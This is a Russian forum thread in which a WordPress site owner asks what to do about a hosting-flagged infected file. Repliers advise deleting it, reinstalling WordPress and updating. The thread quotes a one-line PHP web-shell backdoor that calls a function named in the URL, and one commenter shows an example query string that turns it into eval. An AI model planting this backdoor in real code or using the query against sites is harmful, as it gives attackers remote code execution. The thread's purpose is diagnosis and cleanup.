На сайте wordpress обнаружен вирус хостингом public_html/wp-includes/css/customize-preview-rtl.min.php, что делать?

Question

maratmd @maratmd

На сайте wordpress обнаружен вирус хостингом public_html/wp-includes/css/customize-preview-rtl.min.php, что делать?

Всем привет, недавно на хостинге beget появилось сообщение, что обнаружен один вирус, по этому адресу сайт/public_html/wp-includes/css/customize-preview-rtl.min.php

и сточка показана

<?php @!!!>if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}if(isset($_REQUEST['startx'])){print "

Вопрос задан более трёх лет назад
507 просмотров

3 комментария

Подписаться 1 Простой 3 комментария

Дмитрий @slo_nik

что делать?

Удалять вирус.

Написано более трёх лет назад
Everything_is_not_so_bad @2ord

slo_nik, поможет лишь на короткое время.
WordPress оказалась самой взламываемой CMS в 2018 году

Написано более трёх лет назад
Alex @Kozack Куратор тега WordPress

Роман Мирр,
Согласно докладу, большинство случаев компрометации связаны не с уязвимостями в самих CMS, а с багами в различных темах и плагинах, некорректной конфигурацией и безалаберностью web-мастеров, нередко забывающих обновить программное обеспечение
Подробнее: https://www.securitylab.ru/news/498233.php

Проблема не в самой CMS, а в том, что она очень популярна и доступна, в том числе среди ~~криворуких~~, малоопытных разработчиков

Написано более трёх лет назад

Пригласить эксперта

Ответы на вопрос 4

4 комментария

maratmd @maratmd Автор вопроса

полностью удалить строчку <?php @!!!>if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}if(isset($_REQUEST['startx'])){print "

Написано более трёх лет назад
Талян @flapflapjack

maratmd, Ну если строчка вредоносная, что вы - часть оставить хотите?))
Конечно всю.

Если бы у вас были хотя бы начальные знания PHP, вы бы увидели, что
if(isset($_GET[1])){$_=$_GET;$_[1]($_[2]);exit;}

превращает адресную строку www.site.ru/?1=eval&2=phpinfo();

в PHP код:
eval("phpinfo();");

Имя функции eval и её аргумент можно менять как душе угодно.

Написано более трёх лет назад
maratmd @maratmd Автор вопроса

Анатолий, нашел файл только includes/css/customize-preview-rtl.min.css вместо php расширение css и там такого когда нет, только стили

Написано более трёх лет назад
Талян @flapflapjack

maratmd, ну так вы это не мне пишите, а хостеру.
Может хостинг сам удалил этот файл когда нашёл вирус.

У моего товарища например когда хостинг нашёл такую строку в CMS ModX, он тупо снёс нафиг все файлы без бэкапа.

Написано более трёх лет назад

Комментировать

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации

Похожие вопросы

JavaScript

+3 ещё

Простой
Как стилизовать пагинацию постов по определённому признаку?
- 1 подписчик
- 21 час назад
- 72 просмотра
1

ответ
WordPress

Простой
Как сделать ссылку на полное изображение?
- 1 подписчик
- 22 часа назад
- 43 просмотра
2

ответа
WordPress

+2 ещё

Простой
Как добавить счетчик яндекс метрики в elementor без плагинов?
- 1 подписчик
- 23 часа назад
- 63 просмотра
2

ответа
WordPress

Средний
Как сделать простой парсер своих страниц WordPress с внесением данных в БД?
- 1 подписчик
- вчера
- 52 просмотра
2

ответа
JavaScript

+1 ещё

Простой
Неизвестные скрипты на сайте (plupload и moxie). Для чего?
- 1 подписчик
- вчера
- 107 просмотров
1

ответ
WordPress

+1 ещё

Простой
Как импортировать большую базу данных в Wordpress?
- 1 подписчик
- вчера
- 53 просмотра
2

ответа
WordPress

Простой
Что за файл ru_RU.l10n.php в папке /wp-content/languages/ который переписывает весь перевод?
- 1 подписчик
- вчера
- 29 просмотров
0

ответов
WordPress

Простой
Как исправить ошибку при создании записи Wordpress?
- 1 подписчик
- вчера
- 24 просмотра
2

ответа
WordPress

Средний
Wordpress pagespeed Ninja почему меню отображается под контентом?
- 1 подписчик
- вчера
- 24 просмотра
0

ответов
WordPress

Средний
Wordpress меняет якорь «?» на «#» в UTM ссылках, как починить?
- 1 подписчик
- вчера
- 24 просмотра
1

ответ
Показать ещё Загружается…

WordPress developer (Contractor, Remote)

Hicaliber

До 2 300 $

Разработчик на Wordpress

Nocodered

от 40 000 до 140 000 ₽

Контент-менеджер, редактор (web3, крипто, финансы)

Bitbanker.ru

от 80 000 до 100 000 ₽

Софт на js

19 апр. 2024, в 13:31

10000 руб./за проект

Разработка Pwa сайта

19 апр. 2024, в 13:12

35000 руб./за проект

Доработать вебпроект со стеком: yii2, jquery, vue

19 апр. 2024, в 13:06

6000 руб./за проект

slo_nik, поможет лишь на короткое время.
WordPress оказалась самой взламываемой CMS в 2018 году
Роман Мирр,
Согласно докладу, большинство случаев компрометации связаны не с уязвимостями в самих CMS, а с багами в различных темах и плагинах, некорректной конфигурацией и безалаберностью web-мастеров, нередко забывающих обновить программное обеспечение
Подробнее: https://www.securitylab.ru/news/498233.php

Проблема не в самой CMS, а в том, что она очень популярна и доступна, в том числе среди ~~криворуких~~, малоопытных разработчиков

Answer 1 · 2019-03-09 11:08:10

Ну и? Вам же показали строчку с вирусом. Удалите её, там eval() зашифрован просто.

Попал он туда через какую-то дыру в вордпрессе. Чтобы такого не было, постоянно обновляйте Wordpress.

Хакеры всегда будут искать новые дыры в массовых CMS, а производители софта постоянно их латать. Кто быстрее - тот и выиграл.

Answer 2 · 2019-03-09 14:19:00

Alex @Kozack Куратор тега WordPress

Thinking about a11y

Полностью переустановите WordPress. Замените все его файлы кроме собственной темы и плагинов.

Ответ написан более трёх лет назад

Комментировать

Answer 3 · 2019-03-09 14:42:29

Взять и настроить свой VPS, Web-серверу дать права только на чтение, и забыть про эти проблемы. А удалив строку, завтра можно ждать новую )

Answer 4 · 2019-03-09 15:19:47

Пума Тайланд @opium

Просто люблю качественно работать

Лечить и искать откуда он взялся

Ответ написан более трёх лет назад

Комментировать

На сайте wordpress обнаружен вирус хостингом public_html/wp-includes/css/customize-preview-rtl.min.php, что делать?

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт